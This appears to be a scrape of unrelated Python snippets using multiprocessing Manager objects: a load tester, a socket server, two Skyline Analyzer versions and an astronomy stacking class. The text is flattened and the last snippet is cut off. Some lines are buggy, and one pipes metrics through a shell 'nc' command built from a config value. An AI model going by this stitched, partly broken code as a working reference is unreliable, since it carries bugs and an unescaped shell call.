class JobProcess(multiprocessing.Process): def __init__(self, thread_count, url, extime): multiprocessing.Process.__init__(self) self.thread_count = thread_count self.url = url if extime < 0: extime = 0 self.extime = extime """这里用于产生一个共享变量List否则两个变量始终是0""" self.success = Manager().list() self.failure = Manager().list() def run(self): time.sleep(self.extime) works = [] for i in range(self.thread_count): """这里的args非常的恶心传参(url)则会报错(url,)这样才会成功""" works.append(WorkThread(self.url)) for w in works: w.start() w.join() if w.get_result(): self.success.append(w.get_result()) else: self.failure.append(w.get_result()) pass def get_success_count(self): return len(self.success) def get_failure_count(self): return len(self.failure)
def single_process(single_ip, single_port): server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) server_sock.bind((single_ip, single_port)) server_sock.listen(1024) print(f'Serving on {single_ip,str(single_port)}') cli_list = Manager().list() path_list = Manager().list() cli_list_list = Manager().list() p = Process(target=single_process_server, args=( cli_list, path_list, )) p2 = Process(target=sp_show_list, args=(cli_list_list, )) p.start() p2.start() while True: cli_sock, cli_addr = server_sock.accept() data = "" flag = 0 while True: recv_data = cli_sock.recv(1024).decode("utf-8") if "\r\n" in recv_data: data += recv_data break elif recv_data == "": flag = 1 break else: data += recv_data if flag == 1: cli_sock.close() continue data = data[:-2] print(f"Received {data!r} from {cli_addr!r}") if data == "list": cli_list_list.append(cli_sock) else: file_path = data cli_list.append(cli_sock) path_list.append(file_path)
class Analyzer(Thread): """ The Analyzer class which controls the analyzer thread and spawned processes. """ def __init__(self, parent_pid): """ Initialize the Analyzer Create the :obj:`self.anomalous_metrics` list Create the :obj:`self.exceptions_q` queue Create the :obj:`self.anomaly_breakdown_q` queue """ super(Analyzer, self).__init__() self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.anomalous_metrics = Manager().list() self.exceptions_q = Queue() self.anomaly_breakdown_q = Queue() self.mirage_metrics = Manager().list() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def spin_process(self, i, unique_metrics): """ Assign a bunch of metrics for a process to analyze. Multiple get the assigned_metrics to the process from Redis. For each metric: - unpack the `raw_timeseries` for the metric. - Analyse each timeseries against `ALGORITHMS` to determine if it is anomalous. - If anomalous add it to the :obj:`self.anomalous_metrics` list - Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q` queue - If :mod:`settings.ENABLE_CRUCIBLE` is ``True``: - Add a crucible data file with the details about the timeseries and anomaly. - Write the timeseries to a json file for crucible. Add keys and values to the queue so the parent process can collate for:\n * :py:obj:`self.anomaly_breakdown_q` * :py:obj:`self.exceptions_q` """ spin_start = time() logger.info('spin_process started') # Discover assigned metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES))) if i == settings.ANALYZER_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = min(len(unique_metrics), i * keys_per_processor) # Fix analyzer worker metric assignment #94 # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix assigned_min = (i - 1) * keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.redis_conn.mget(assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name) # If it's anomalous, add it to list if anomalous: base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1) metric = [datapoint, base_name] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? triggered_algorithms = [] for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 triggered_algorithms.append(algorithm) # If Crucible or Panorama are enabled determine details determine_anomaly_details = False if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED: determine_anomaly_details = True if settings.PANORAMA_ENABLED: determine_anomaly_details = True if determine_anomaly_details: metric_timestamp = str(int(timeseries[-1][0])) from_timestamp = str(int(timeseries[1][0])) timeseries_dir = base_name.replace('.', '/') # If Panorama is enabled - create a Panorama check if settings.PANORAMA_ENABLED: if not os.path.exists(settings.PANORAMA_CHECK_PATH): if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(settings.PANORAMA_CHECK_PATH, mode_arg) # Note: # The values are enclosed is single quoted intentionally # as the imp.load_source used results in a shift in the # decimal position when double quoted, e.g. # value = "5622.0" gets imported as # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2 # single quoting results in the desired, # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0 added_at = str(int(time())) source = 'graphite' panaroma_anomaly_data = 'metric = \'%s\'\n' \ 'value = \'%s\'\n' \ 'from_timestamp = \'%s\'\n' \ 'metric_timestamp = \'%s\'\n' \ 'algorithms = %s\n' \ 'triggered_algorithms = %s\n' \ 'app = \'%s\'\n' \ 'source = \'%s\'\n' \ 'added_by = \'%s\'\n' \ 'added_at = \'%s\'\n' \ % (base_name, str(datapoint), from_timestamp, metric_timestamp, str(settings.ALGORITHMS), triggered_algorithms, skyline_app, source, this_host, added_at) # Create an anomaly file with details about the anomaly panaroma_anomaly_file = '%s/%s.%s.txt' % ( settings.PANORAMA_CHECK_PATH, added_at, base_name) try: write_data_to_file( skyline_app, panaroma_anomaly_file, 'w', panaroma_anomaly_data) logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file)) except: logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file)) logger.info(traceback.format_exc()) # If Crucible is enabled - save timeseries and create a # Crucible check if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED: crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp if not os.path.exists(crucible_anomaly_dir): if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(crucible_anomaly_dir, mode_arg) # Note: # The values are enclosed is single quoted intentionally # as the imp.load_source used in crucible results in a # shift in the decimal position when double quoted, e.g. # value = "5622.0" gets imported as # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2 # single quoting results in the desired, # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0 crucible_anomaly_data = 'metric = \'%s\'\n' \ 'value = \'%s\'\n' \ 'from_timestamp = \'%s\'\n' \ 'metric_timestamp = \'%s\'\n' \ 'algorithms = %s\n' \ 'triggered_algorithms = %s\n' \ 'anomaly_dir = \'%s\'\n' \ 'graphite_metric = True\n' \ 'run_crucible_tests = False\n' \ 'added_by = \'%s\'\n' \ 'added_at = \'%s\'\n' \ % (base_name, str(datapoint), from_timestamp, metric_timestamp, str(settings.ALGORITHMS), triggered_algorithms, crucible_anomaly_dir, skyline_app, metric_timestamp) # Create an anomaly file with details about the anomaly crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name) try: write_data_to_file( skyline_app, crucible_anomaly_file, 'w', crucible_anomaly_data) logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file)) except: logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file)) logger.info(traceback.format_exc()) # Create timeseries json file with the timeseries json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name) timeseries_json = str(timeseries).replace('[', '(').replace(']', ')') try: write_data_to_file(skyline_app, json_file, 'w', timeseries_json) logger.info('added crucible timeseries file :: %s' % (json_file)) except: logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file)) logger.info(traceback.format_exc()) # Create a crucible check file crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name) try: write_data_to_file( skyline_app, crucible_check_file, 'w', crucible_anomaly_data) logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp)) except: logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file)) logger.info(traceback.format_exc()) # It could have been deleted by the Roomba except TypeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info(traceback.format_exc()) # Add values to the queue so the parent process can collate for key, value in anomaly_breakdown.items(): self.anomaly_breakdown_q.put((key, value)) for key, value in exceptions.items(): self.exceptions_q.put((key, value)) spin_end = time() - spin_start logger.info('spin_process took %.2f seconds' % spin_end) def run(self): """ - Called when the process intializes. - Determine if Redis is up and discover the number of `unique metrics`. - Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES` and assign each process a set of metrics to analyse for anomalies. - Wait for the processes to finish. - Determine whether if any anomalous metrics require: - Alerting on (and set `EXPIRATION_TIME` key in Redis for alert). - Feed to another module e.g. mirage. - Alert to syslog. - Populate the webapp json with the anomalous_metrics details. - Log the details about the run to the skyline analyzer log. - Send skyline.analyzer metrics to `GRAPHITE_HOST` """ # Log management to prevent overwriting # Allow the bin/<skyline_app>.d to manage the log if os.path.isfile(skyline_app_logwait): try: os.remove(skyline_app_logwait) except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_logwait) pass now = time() log_wait_for = now + 5 while now < log_wait_for: if os.path.isfile(skyline_app_loglock): sleep(.1) now = time() else: now = log_wait_for + 1 logger.info('starting %s run' % skyline_app) if os.path.isfile(skyline_app_loglock): logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app) try: os.remove(skyline_app_loglock) logger.info('log lock file removed') except OSError: logger.error('error - failed to remove %s, continuing' % skyline_app_loglock) pass else: logger.info('bin/%s.d log management done' % skyline_app) if not os.path.exists(settings.SKYLINE_TMP_DIR): if python_version == 2: mode_arg = int('0755') if python_version == 3: mode_arg = mode=0o755 os.makedirs(settings.SKYLINE_TMP_DIR, mode_arg) # Initiate the algorithm timings if Analyzer is configured to send the # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.' algorithms_to_time = [] if send_algorithm_run_metrics: algorithms_to_time = settings.ALGORITHMS while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH) continue # Report app up self.redis_conn.setex(skyline_app, 120, now) # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Using count files rather that multiprocessing.Value to enable metrics for # metrics for algorithm run times, etc for algorithm in algorithms_to_time: algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count' algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings' # with open(algorithm_count_file, 'a') as f: with open(algorithm_count_file, 'w') as f: pass with open(algorithm_timings_file, 'w') as f: pass # Remove any existing algorithm.error files from any previous runs # that did not cleanup for any reason pattern = '%s.*.algorithm.error' % skyline_app try: for f in os.listdir(settings.SKYLINE_TMP_DIR): if re.search(pattern, f): try: os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f)) logger.info('cleaning up old error file - %s' % (str(f))) except OSError: pass except: logger.error('failed to cleanup algorithm.error files ' + traceback.format_exc()) # Spawn processes pids = [] spawned_pids = [] pid_count = 0 for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info('WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) pid_count += 1 logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES))) p.start() spawned_pids.append(p.pid) # Send wait signal to zombie processes # for p in pids: # p.join() # Self monitor processes and terminate if any spin_process has run # for longer than 180 seconds - 20160512 @earthgecko p_starts = time() while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME: if any(p.is_alive() for p in pids): # Just to avoid hogging the CPU sleep(.1) else: # All the processes are done, break now. time_to_run = time() - p_starts logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run)) break else: # We only enter this if we didn't 'break' above. logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app)) for p in pids: p.terminate() p.join() # Log the last reported error by any algorithms that errored in the # spawned processes from algorithms.py for completed_pid in spawned_pids: logger.info('spin_process with pid %s completed' % (str(completed_pid))) for algorithm in settings.ALGORITHMS: algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % ( settings.SKYLINE_TMP_DIR, skyline_app, str(completed_pid), algorithm) if os.path.isfile(algorithm_error_file): logger.info( 'error - spin_process with pid %s has reported an error with the %s algorithm' % ( str(completed_pid), algorithm)) try: with open(algorithm_error_file, 'r') as f: error_string = f.read() logger.error('%s' % str(error_string)) except: logger.error('failed to read %s error file' % algorithm) try: os.remove(algorithm_error_file) except OSError: pass # Grab data from the queue and populate dictionaries exceptions = dict() anomaly_breakdown = dict() while 1: try: key, value = self.anomaly_breakdown_q.get_nowait() if key not in anomaly_breakdown.keys(): anomaly_breakdown[key] = value else: anomaly_breakdown[key] += value except Empty: break while 1: try: key, value = self.exceptions_q.get_nowait() if key not in exceptions.keys(): exceptions[key] = value else: exceptions[key] += value except Empty: break # Send alerts if settings.ENABLE_ALERTS: for alert in settings.ALERTS: for metric in self.anomalous_metrics: ALERT_MATCH_PATTERN = alert[0] METRIC_PATTERN = metric[1] alert_match_pattern = re.compile(ALERT_MATCH_PATTERN) pattern_match = alert_match_pattern.match(METRIC_PATTERN) if pattern_match: cache_key = 'last_alert.%s.%s' % (alert[1], metric[1]) try: last_alert = self.redis_conn.get(cache_key) if not last_alert: try: SECOND_ORDER_RESOLUTION_FULL_DURATION = alert[3] logger.info('mirage check :: %s' % (metric[1])) # Write anomalous metric to test at second # order resolution by crucible to the check # file metric_timestamp = int(time()) anomaly_check_file = '%s/%s.%s.txt' % (settings.MIRAGE_CHECK_PATH, metric_timestamp, metric[1]) with open(anomaly_check_file, 'w') as fh: # metric_name, anomalous datapoint, hours to resolve, timestamp fh.write('metric = "%s"\nvalue = "%s"\nhours_to_resolve = "%s"\nmetric_timestamp = "%s"\n' % (metric[1], metric[0], alert[3], metric_timestamp)) if python_version == 2: mode_arg = int('0644') if python_version == 3: mode_arg = '0o644' os.chmod(anomaly_check_file, mode_arg) logger.info('added mirage check :: %s,%s,%s' % (metric[1], metric[0], alert[3])) # Add to the mirage_metrics list base_name = METRIC_PATTERN.replace(settings.FULL_NAMESPACE, '', 1) metric = [metric[0], base_name] self.mirage_metrics.append(metric) # Alert for analyzer if enabled if settings.ENABLE_FULL_DURATION_ALERTS: self.redis_conn.setex(cache_key, alert[2], packb(metric[0])) trigger_alert(alert, metric) except: self.redis_conn.setex(cache_key, alert[2], packb(metric[0])) trigger_alert(alert, metric) except Exception as e: logger.error('error :: could not send alert: %s' % e) # Push to crucible # if len(self.crucible_anomalous_metrics) > 0: # logger.info('to do - push to crucible') # Write anomalous_metrics to static webapp directory if len(self.anomalous_metrics) > 0: filename = path.abspath(path.join(path.dirname(__file__), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) # Using count files rather that multiprocessing.Value to enable metrics for # metrics for algorithm run times, etc for algorithm in algorithms_to_time: algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count' algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings' try: algorithm_count_array = [] with open(algorithm_count_file, 'r') as f: for line in f: value_string = line.replace('\n', '') unquoted_value_string = value_string.replace("'", '') float_value = float(unquoted_value_string) algorithm_count_array.append(float_value) except: algorithm_count_array = False if not algorithm_count_array: continue number_of_times_algorithm_run = len(algorithm_count_array) logger.info( 'algorithm run count - %s run %s times' % ( algorithm, str(number_of_times_algorithm_run))) if number_of_times_algorithm_run == 0: continue try: algorithm_timings_array = [] with open(algorithm_timings_file, 'r') as f: for line in f: value_string = line.replace('\n', '') unquoted_value_string = value_string.replace("'", '') float_value = float(unquoted_value_string) algorithm_timings_array.append(float_value) except: algorithm_timings_array = False if not algorithm_timings_array: continue number_of_algorithm_timings = len(algorithm_timings_array) logger.info( 'algorithm timings count - %s has %s timings' % ( algorithm, str(number_of_algorithm_timings))) if number_of_algorithm_timings == 0: continue try: _sum_of_algorithm_timings = sum(algorithm_timings_array) except: logger.error("sum error: " + traceback.format_exc()) _sum_of_algorithm_timings = round(0.0, 6) logger.error('error - sum_of_algorithm_timings - %s' % (algorithm)) continue sum_of_algorithm_timings = round(_sum_of_algorithm_timings, 6) # logger.info('sum_of_algorithm_timings - %s - %.16f seconds' % (algorithm, sum_of_algorithm_timings)) try: _median_algorithm_timing = determine_median(algorithm_timings_array) except: _median_algorithm_timing = round(0.0, 6) logger.error('error - _median_algorithm_timing - %s' % (algorithm)) continue median_algorithm_timing = round(_median_algorithm_timing, 6) # logger.info('median_algorithm_timing - %s - %.16f seconds' % (algorithm, median_algorithm_timing)) logger.info( 'algorithm timing - %s - total: %.6f - median: %.6f' % ( algorithm, sum_of_algorithm_timings, median_algorithm_timing)) use_namespace = skyline_app_graphite_namespace + '.algorithm_breakdown.' + algorithm send_metric_name = use_namespace + '.timing.times_run' send_graphite_metric(skyline_app, send_metric_name, str(number_of_algorithm_timings)) send_metric_name = use_namespace + '.timing.total_time' send_graphite_metric(skyline_app, send_metric_name, str(sum_of_algorithm_timings)) send_metric_name = use_namespace + '.timing.median_time' send_graphite_metric(skyline_app, send_metric_name, str(median_algorithm_timing)) run_time = time() - now total_metrics = str(len(unique_metrics)) total_analyzed = str(len(unique_metrics) - sum(exceptions.values())) total_anomalies = str(len(self.anomalous_metrics)) # Log progress logger.info('seconds to run :: %.2f' % run_time) logger.info('total metrics :: %s' % total_metrics) logger.info('total analyzed :: %s' % total_analyzed) logger.info('total anomalies :: %s' % total_anomalies) logger.info('exception stats :: %s' % exceptions) logger.info('anomaly breakdown :: %s' % anomaly_breakdown) # Log to Graphite graphite_run_time = '%.2f' % run_time send_metric_name = skyline_app_graphite_namespace + '.run_time' send_graphite_metric(skyline_app, send_metric_name, graphite_run_time) send_metric_name = skyline_app_graphite_namespace + '.total_analyzed' send_graphite_metric(skyline_app, send_metric_name, total_analyzed) send_metric_name = skyline_app_graphite_namespace + '.total_anomalies' send_graphite_metric(skyline_app, send_metric_name, total_anomalies) send_metric_name = skyline_app_graphite_namespace + '.total_metrics' send_graphite_metric(skyline_app, send_metric_name, total_metrics) for key, value in exceptions.items(): send_metric_name = '%s.exceptions.%s' % (skyline_app_graphite_namespace, key) send_graphite_metric(skyline_app, send_metric_name, str(value)) for key, value in anomaly_breakdown.items(): send_metric_name = '%s.anomaly_breakdown.%s' % (skyline_app_graphite_namespace, key) send_graphite_metric(skyline_app, send_metric_name, str(value)) # Check canary metric raw_series = self.redis_conn.get(settings.FULL_NAMESPACE + settings.CANARY_METRIC) if raw_series is not None: unpacker = Unpacker(use_list=False) unpacker.feed(raw_series) timeseries = list(unpacker) time_human = (timeseries[-1][0] - timeseries[0][0]) / 3600 projected = 24 * (time() - now) / time_human logger.info('canary duration :: %.2f' % time_human) send_metric_name = skyline_app_graphite_namespace + '.duration' send_graphite_metric(skyline_app, send_metric_name, str(time_human)) send_metric_name = skyline_app_graphite_namespace + '.projected' send_graphite_metric(skyline_app, send_metric_name, str(projected)) # Reset counters self.anomalous_metrics[:] = [] # Sleep if it went too fast # if time() - now < 5: # logger.info('sleeping due to low run time...') # sleep(10) # @modified 20160504 - @earthgecko - development internal ref #1338, #1340) # Etsy's original for this was a value of 5 seconds which does # not make skyline Analyzer very efficient in terms of installations # where 100s of 1000s of metrics are being analyzed. This lead to # Analyzer running over several metrics multiple time in a minute # and always working. Therefore this was changed from if you took # less than 5 seconds to run only then sleep. This behaviour # resulted in Analyzer analysing a few 1000 metrics in 9 seconds and # then doing it again and again in a single minute. Therefore the # ANALYZER_OPTIMUM_RUN_DURATION setting was added to allow this to # self optimise in cases where skyline is NOT deployed to analyze # 100s of 1000s of metrics. This relates to optimising performance # for any deployments in the few 1000s and 60 second resolution # area, e.g. smaller and local deployments. process_runtime = time() - now analyzer_optimum_run_duration = settings.ANALYZER_OPTIMUM_RUN_DURATION if process_runtime < analyzer_optimum_run_duration: sleep_for = (analyzer_optimum_run_duration - process_runtime) logger.info('sleeping for %.2f seconds due to low run time...' % sleep_for) sleep(sleep_for)
class load(object): def __init__(self, imagename, catalogname, width=1, beam=None, delimiter=",", verbosity=0, beam2pix=False, cores=2): self.log = utils.logger(verbosity) self.active = Manager().Value("d", 0) self.cores = cores self.log.info("Laoding Image data and catalog info") self.imagename = imagename self.catalogname = catalogname self.delimiter = delimiter # Load data self.catalog = numpy.loadtxt(self.catalogname, delimiter=self.delimiter) self.nprofs = len(self.catalog) self.data, self.hdr, self.wcs = utils.loadFits(imagename) self.ndim = self.hdr["naxis"] self.centre = self.wcs.getCentreWCSCoords() self.log.info("Image Centre RA,DEC {:+.3g}, {:+.3g} Deg".format(*self.centre)) cubeslice = [slice(None)]*self.ndim if self.ndim >3: stokes_ind = self.ndim - utils.fitsInd(self.hdr, "STOKES") cubeslice[stokes_ind] = 0 self.cube = self.data[cubeslice] self.profiles = Manager().list([]) self.weights = Manager().Value("d", 0) ind = utils.fitsInd(self.hdr, "FREQ") self.crpix = self.hdr["crpix%d"%ind] self.crval = self.hdr["crval%d"%ind] self.dfreq = self.hdr["cdelt%d"%ind] self.freq0 = self.crval + (self.crpix-1)*self.dfreq self.nchan = self.hdr["naxis%d"%ind] self.width = int(width*1e6/self.dfreq) # Find restoring beam in FITS header if not specified if isinstance(beam, (float, int)): if beam==0: beam = None else: self.bmaj = self.bmin = beam/3600. self.bpa = 0 elif isinstance(beam, (list, tuple)): self.bmaj, self.bmin, self.bpa = beam self.bmaj /= 3600. self.bmin /= 3600. elif beam is None: try: self.bmaj = self.hdr["bmaj"] self.bmin = self.hdr["bmin"] self.bpa = self.hdr["bpa"] except KeyError: self.log.critical("Beam not specified, and no beam information in FITS header") else: raise TypeError("Beam must be a list, tuple, int or float") self.bmajPix = int(self.bmaj/abs( self.wcs.getXPixelSizeDeg() ) ) self.bminPix = int(self.bmin/abs( self.wcs.getXPixelSizeDeg() ) ) self.beamPix = self.bmajPix self.beam2pix = beam2pix self.excluded = Manager().Value("d",0) self.track = Manager().Value("d",0) self.lock = Lock() def profile(self, radeg, decdeg, cfreq, weight, pid): rapix, decpix = self.wcs.wcs2pix(radeg, decdeg) cfreqPix = int((cfreq - self.freq0)/self.dfreq ) zstart = cfreqPix - self.width/2 zend = cfreqPix + self.width/2 beamPix = self.beamPix ystart, yend = (decpix-beamPix/2.), (decpix+beamPix/2.) xstart, xend = (rapix-beamPix/2.), (rapix+beamPix/2.) self.log.debug("Line profile {:.3f} {:.3f} {:d}-{:d}".format(rapix, decpix, zstart, zend)) pcube = self.cube[zstart:zend, ystart:yend, xstart:xend] # Check if this profile is with stacking if pcube.shape != (self.width, beamPix, beamPix): padz, pady, padx = (0,0), (0,0), (0,0) diffx, diffy, diffz = 0, 0, 0 if pcube.shape[0] != self.width: diffz = self.width - pcube.shape[0] if cfreqPix < self.cube.shape[0]/2: padz = diffz, 0 else: padz = 0, diffz if pcube.shape[1] != beamPix: diffy = beamPix - pcube.shape[1] if ystart<0: pady = diffy, 0 else: pady = 0, diffy if pcube.shape[2] != beamPix: diffx = beamPix - pcube.shape[2] if xstart<0: padx = diffx, 0 else: padx = 0, diffx if diffz > self.width/2 or diffx > beamPix/2 or diffy > beamPix/2: self.log.debug("Skipping Profile {:d}, its close too an edge (s).".format(pid)) self.excluded.value += 1 return else: npad = padz, pady, padx self.log.debug("Profile {:d} is close an edge(s). Padding the exctracted cube by {:s} ".format(pid, repr(npad))) pcube = numpy.pad(pcube, pad_width=npad, mode="constant") else: self.log.debug("Extracting profile {:d}".format(pid)) self.lock.acquire() self.weights.value += weight self.track.value += 1 self.profiles.append(pcube*weight) self.lock.release() self.active.value -= 1 def stack(self): nprofs = len(self.catalog) self.log.info("Stacking {:d} line profiles".format(nprofs)) # Run these jobs in parallel procs = [] range_ = range(10, 110, 10) print("Progress:"), counter = 0 while counter <= nprofs-1: if self.active >= self.cores: continue ra, dec, cfreq, w, _id = self.catalog proc = Process(target=self.profile, args = (ra, dec, cfreq, w, counter) ) proc.start() procs.append(proc) counter += 1 self.active.value += 1 nn = int(self.track.value/float(self.nprofs)*100) if nn in range_: print("..{:d}%".format(nn)), range_.remove(nn) for proc in procs: proc.join() print("..100%\n") self.log.info("Have stackem all") self.log.info("{:d} out of {:d} profiles were excluded because they \ were too close to an edge".format(self.excluded.value, nprofs)) stack = numpy.sum(self.profiles, 0) if self.beam2pix: mask = utils.elliptical_mask(stack[0], self.bmajPix/2, self.bminPix/2, self.bpa) stack = utils.gauss_weights(stack, self.bmajPix/2, self.bminPix/2, mask=mask) profile = stack.sum((1, 2))/self.weights.value return profile def fit_gaussian(self, profile): nn = len(profile) xx = range(nn) import scipy.stats as stats from scipy.optimize import leastsq sigma = 1 #stats.moment(profile, moment=1) mu = xx[nn/2] peak = profile.max() def res(p0, x, y): peak, mu, sigma = p0 yf = utils.gauss(x, peak, mu, sigma) return y - yf params = leastsq(res, (peak, mu, sigma), args=(xx, profile))[0] return params
class Analyzer(Thread): def __init__(self, parent_pid): """ Initialize the Analyzer """ super(Analyzer, self).__init__() self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH) self.daemon = True self.parent_pid = parent_pid self.current_pid = getpid() self.lock = Lock() self.exceptions = Manager().dict() self.anomaly_breakdown = Manager().dict() self.anomalous_metrics = Manager().list() def check_if_parent_is_alive(self): """ Self explanatory """ try: kill(self.current_pid, 0) kill(self.parent_pid, 0) except: exit(0) def spin_process(self, i, unique_metrics): """ Assign a bunch of metrics for a process to analyze. """ # Discover assigned metrics keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES))) if i == settings.ANALYZER_PROCESSES: assigned_max = len(unique_metrics) else: assigned_max = i * keys_per_processor assigned_min = assigned_max - keys_per_processor assigned_keys = range(assigned_min, assigned_max) # Compile assigned metrics assigned_metrics = [unique_metrics[index] for index in assigned_keys] # Check if this process is unnecessary if len(assigned_metrics) == 0: return # Multi get series raw_assigned = self.redis_conn.mget(assigned_metrics) # Make process-specific dicts exceptions = defaultdict(int) anomaly_breakdown = defaultdict(int) # Distill timeseries strings into lists for i, metric_name in enumerate(assigned_metrics): self.check_if_parent_is_alive() try: raw_series = raw_assigned[i] unpacker = Unpacker(use_list = False) unpacker.feed(raw_series) timeseries = list(unpacker) anomalous, ensemble, datapoint = run_selected_algorithm(timeseries) # If it's anomalous, add it to list if anomalous: metric = [datapoint, metric_name] self.anomalous_metrics.append(metric) # Get the anomaly breakdown - who returned True? for index, value in enumerate(ensemble): if value: algorithm = settings.ALGORITHMS[index] anomaly_breakdown[algorithm] += 1 # It could have been deleted by the Roomba except AttributeError: exceptions['DeletedByRoomba'] += 1 except TooShort: exceptions['TooShort'] += 1 except Stale: exceptions['Stale'] += 1 except Incomplete: exceptions['Incomplete'] += 1 except Boring: exceptions['Boring'] += 1 except: exceptions['Other'] += 1 logger.info(traceback.format_exc()) # Collate process-specific dicts to main dicts with self.lock: for key, value in anomaly_breakdown.items(): if key not in self.anomaly_breakdown: self.anomaly_breakdown[key] = value else: self.anomaly_breakdown[key] += value for key, value in exceptions.items(): if key not in self.exceptions: self.exceptions[key] = value else: self.exceptions[key] += value def run(self): """ Called when the process intializes. """ while 1: now = time() # Make sure Redis is up try: self.redis_conn.ping() except: logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH) sleep(10) self.redis_conn = StrictRedis(unix_socket_path = settings.REDIS_SOCKET_PATH) continue # Discover unique metrics unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics')) if len(unique_metrics) == 0: logger.info('no metrics in redis. try adding some - see README') sleep(10) continue # Spawn processes pids = [] for i in range(1, settings.ANALYZER_PROCESSES + 1): if i > len(unique_metrics): logger.info('WARNING: skyline is set for more cores than needed.') break p = Process(target=self.spin_process, args=(i, unique_metrics)) pids.append(p) p.start() # Send wait signal to zombie processes for p in pids: p.join() # Write anomalous_metrics to static webapp directory filename = path.abspath(path.join(path.dirname( __file__ ), '..', settings.ANOMALY_DUMP)) with open(filename, 'w') as fh: # Make it JSONP with a handle_data() function anomalous_metrics = list(self.anomalous_metrics) anomalous_metrics.sort(key=operator.itemgetter(1)) fh.write('handle_data(%s)' % anomalous_metrics) # Log progress logger.info('seconds to run :: %.2f' % (time() - now)) logger.info('total metrics :: %d' % len(unique_metrics)) logger.info('total analyzed :: %d' % (len(unique_metrics) - sum(self.exceptions.values()))) logger.info('total anomalies :: %d' % len(self.anomalous_metrics)) logger.info('exception stats :: %s' % self.exceptions) logger.info('anomaly breakdown :: %s' % self.anomaly_breakdown) # Log to Graphite if settings.GRAPHITE_HOST != '': host = settings.GRAPHITE_HOST.replace('http://', '') system('echo skyline.analyzer.run_time %.2f %s | nc -w 3 %s 2003' % ((time() - now), now, host)) # Check canary metric raw_series = 